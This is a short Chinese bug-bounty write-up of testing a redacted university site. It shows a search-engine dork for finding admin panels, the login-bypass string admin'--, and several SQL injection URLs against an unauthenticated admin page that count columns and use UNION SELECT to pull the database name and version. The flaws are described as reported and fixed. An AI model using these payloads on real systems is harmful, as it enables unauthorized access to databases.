0x01 寻找目标找个软柿子
语法title="xxx大学" 后台管理
通常后台会比较容易出货 一顿翻看发现后台有个注入
经过一顿测试发现有狗
以我们的性格那必然是有狗就跑啊(还是得试试的)
在我一顿操作猛如虎的操作下最终一个万能密码 admin'--成功进入后台
当然事情到这里并没有结束
0x02 事后复测
答应了好兄弟整一个同款证书于是决定回头复测此战
通过上一次进后台记录遗留的路径可以未授权访问到这个页面还发现参数可以注入
判断列数
https://xxx.edu.cn/admin/student/editSubClass.aspx?vid=chinese%27+order%20by%208
与int不兼容
将数字换成null后正常
查询库名
https://xxx.edu.cn/admin/student/editSubClass.aspx?vid=chinese%27%20UNION%20all%20SELECT%201,2,db_name(),null,null,null,null%20from%20master..sysdatabases--
https://xxx.edu.cn/admin/student/editSubClass.aspx?vid=chinese' union+all+select+null,@@version,null,null,db_name(),null,null--+
至此
两个证书到手漏洞均已提交edusrc且已修复.这个故事告诉我们当一个站有一个洞那么他很有可能有第二个洞.不要错过每个细节
原文始发于微信公众号(渗透安全团队):edusrc某x交大实战
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论